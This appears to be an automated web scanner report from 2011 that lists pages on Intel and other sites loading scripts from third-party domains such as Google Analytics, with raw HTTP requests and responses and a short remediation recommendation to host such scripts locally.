Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:17:40 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=222cb97a2603f1b3e7ce4b3ecc102334; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]... <div class="description"><script type="text/javascript" src="https://api-secure.recaptcha.net/challenge?k=6LeMuAcAAAAAADFmx9xeDOuxDOR7xMIB-cJUbQcg"></script> ...[SNIP]...
GET /csr/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:12 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=21860 t=1296947772964579 Connection: close Content-Length: 67274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /csr/2010/06/what_do_intel_chips_and_sam_ad.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:16 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=8258 t=1296947776634830 Connection: close Content-Length: 30647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /csr/2011/01/solar_power_is_learning_power.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:12 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=6197 t=1296947772984947 Vary: Accept-Encoding Connection: close Content-Length: 32683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /csr/2011/01/the_final_four_the_super_bowl.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:13 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=4566 t=1296947773041567 Connection: close Content-Length: 33177
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /csr/2011/02/investing_big_in_renewable_ene.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:12 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=22987 t=1296947772962393 Connection: close Content-Length: 33158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /csr/2011/02/social_entrepreneurship_buzz_w.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:12 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=22471 t=1296947772891159 Vary: Accept-Encoding Connection: close Content-Length: 31218
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /csr/assets_c/2011/02/DSC07688-thumb-300x225.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:13 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5317 t=1296947773190967 Content-Length: 377 Connection: close
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /csr/authors HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:16 GMT Server: Apache Content-Location: authors.php Vary: negotiate,Accept-Encoding TCN: choice Content-Type: text/html; charset=UTF-8 CacheHit: D=13793 t=1296947776564222 Connection: close Content-Length: 76975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /csr/education/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:14 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=8466 t=1296947774560801 Connection: close Content-Length: 183197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /csr/general-csr/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:12 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=26252 t=1296947772892953 Vary: Accept-Encoding Connection: close Content-Length: 189575
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /csr/green/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:12 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=6714 t=1296947772333211 Vary: Accept-Encoding Connection: close Content-Length: 67616
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /healthcare/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:23 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=7768 t=1296947783723161 Vary: Accept-Encoding Connection: close Content-Length: 172383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /healthcare/2011/01/waiting_and_innovating_for_21st_century_healthcare.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:22 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=5263 t=1296947782454034 Vary: Accept-Encoding Connection: close Content-Length: 38886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /jobs/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:21 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5205 t=1296947781468896 Connection: close Content-Length: 42181
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:18 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=7024 t=1296947778767507 Vary: Accept-Encoding Connection: close Content-Length: 34050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:17 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5699 t=1296947777549940 Connection: close Content-Length: 38836
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /jobs/2010/12/why_non-techies_should_consider_intel.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:17 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=10275 t=1296947777188938 Connection: close Content-Length: 35786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:19 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=4760 t=1296947779216933 Vary: Accept-Encoding Connection: close Content-Length: 36265
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /jobs/2011/01/top_ten_reasons_i_work_for_intel.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5263 t=1296947779269283 Connection: close Content-Length: 41979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /jobs/2011/01/you_want_me_to_move_where.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:18 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=4500 t=1296947778837871 Connection: close Content-Length: 33718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The response dynamically includes the following scripts from other domains:
http://v6.flickrshow.com/scripts/
http://www.google-analytics.com/urchin.js
Request
GET /jobs/about-us/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:22 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=6041 t=1296947782477121 Connection: close Content-Length: 64858
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The response dynamically includes the following scripts from other domains:
http://v6.flickrshow.com/scripts/
http://www.google-analytics.com/urchin.js
Request
GET /jobs/just-for-students/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:22 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=7672 t=1296947782408018 Vary: Accept-Encoding Connection: close Content-Length: 88344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The response dynamically includes the following scripts from other domains:
http://v6.flickrshow.com/scripts/
http://www.google-analytics.com/urchin.js
Request
GET /jobs/life-at-intel/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5613 t=1296947779536465 Connection: close Content-Length: 72711
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The response dynamically includes the following scripts from other domains:
http://v6.flickrshow.com/scripts/
http://www.google-analytics.com/urchin.js
Request
GET /jobs/your-future/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=4807 t=1296947779399903 Connection: close Content-Length: 38135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /research/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:12 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=21677 t=1296947772895448 Vary: Accept-Encoding Connection: close Content-Length: 38839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /technology/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:09 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=5787 t=1296947769507872 Vary: Accept-Encoding Connection: close Content-Length: 80072
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
GET /p/simplemodal/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /community/openportit/server HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following scripts from other domains:
http://www.google-analytics.com/urchin.js
http://www.vproexpert.com/E24VZ/sdmenu/sdmenu.js
Request
GET /community/openportit/vproexpert HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /community/tech HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /community/tech/desktop HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /index.jspa HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /submit?url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /UI HTTP/1.1 Host: docs.jquery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:12 GMT Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1 X-Powered-By: PHP/5.2.3-1+lenny1 Vary: Accept-Encoding,Cookie Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: private, must-revalidate, max-age=0 Last-modified: Mon, 31 Jan 2011 21:54:34 GMT Content-language: en Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="con ...[SNIP]... <![endif]-->
GET /UI/Accordion HTTP/1.1 Host: docs.jquery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:13 GMT Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1 X-Powered-By: PHP/5.2.3-1+lenny1 Content-language: en Vary: Accept-Encoding,Cookie Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: private, must-revalidate, max-age=0 Last-modified: Mon, 31 Jan 2011 21:54:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45021
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="con ...[SNIP]... <![endif]-->
GET /UI/Tabs HTTP/1.1 Host: docs.jquery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:13 GMT Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1 X-Powered-By: PHP/5.2.3-1+lenny1 Content-language: en Vary: Accept-Encoding,Cookie Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: private, must-revalidate, max-age=0 Last-modified: Mon, 31 Jan 2011 21:54:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="con ...[SNIP]... <![endif]-->
The response dynamically includes the following scripts from other domains:
http://s7.addthis.com/js/250/addthis_widget.js
http://widgets.digg.com/buttons.js
Request
GET /About/ HTTP/1.1 Host: edc.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=hlfql3zl4uup4pepy0p2jses; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:17:28 GMT Connection: close Content-Length: 73615
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The response dynamically includes the following scripts from other domains:
http://s7.addthis.com/js/250/addthis_widget.js
http://widgets.digg.com/buttons.js
Request
GET /Platforms/Roadmap/ HTTP/1.1 Host: edc.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=2hdok02x1dpz1hzv5o15erng; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:17:26 GMT Connection: close Content-Length: 442613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The response dynamically includes the following scripts from other domains:
http://s7.addthis.com/js/250/addthis_widget.js
http://widgets.digg.com/buttons.js
Request
GET /Step-by-Step/Selector-Guide/ HTTP/1.1 Host: edc.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=b25zxpftzkbp4mfyjamtgp55; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:17:22 GMT Connection: close Content-Length: 51675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET / HTTP/1.1 Host: flesler.blogspot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 23:17:47 GMT Date: Sat, 05 Feb 2011 23:17:47 GMT Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e" X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate Age: 0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g ...[SNIP]... <link href='http://flesler-blog.googlecode.com/svn/trunk/style.css' rel='stylesheet' type='text/css'/> <script src='http://flesler-blog.googlecode.com/svn/trunk/helpers.js' type='text/javascript'></script> ...[SNIP]... <!-- MY INCLUDES --> <script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script> <script src='http://flesler-blog.googlecode.com/svn/trunk/ga.init.js' type='text/javascript'></script> <script src='http://flesler-blog.googlecode.com/svn/trunk/comments.js' type='text/javascript'></script> ...[SNIP]... </script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script> ...[SNIP]...
GET /2007/10/jquerylocalscroll-10.html HTTP/1.1 Host: flesler.blogspot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 23:17:48 GMT Date: Sat, 05 Feb 2011 23:17:48 GMT Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e" X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate Age: 0 Connection: close
GET /2007/10/jqueryscrollto.html HTTP/1.1 Host: flesler.blogspot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 23:17:47 GMT Date: Sat, 05 Feb 2011 23:17:47 GMT Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e" X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate Age: 0 Connection: close
GET /jquery/jcarousellite/ HTTP/1.1 Host: gmarwaha.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:04 GMT Server: Apache X-Powered-By: PHP/5.2.16 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 30189
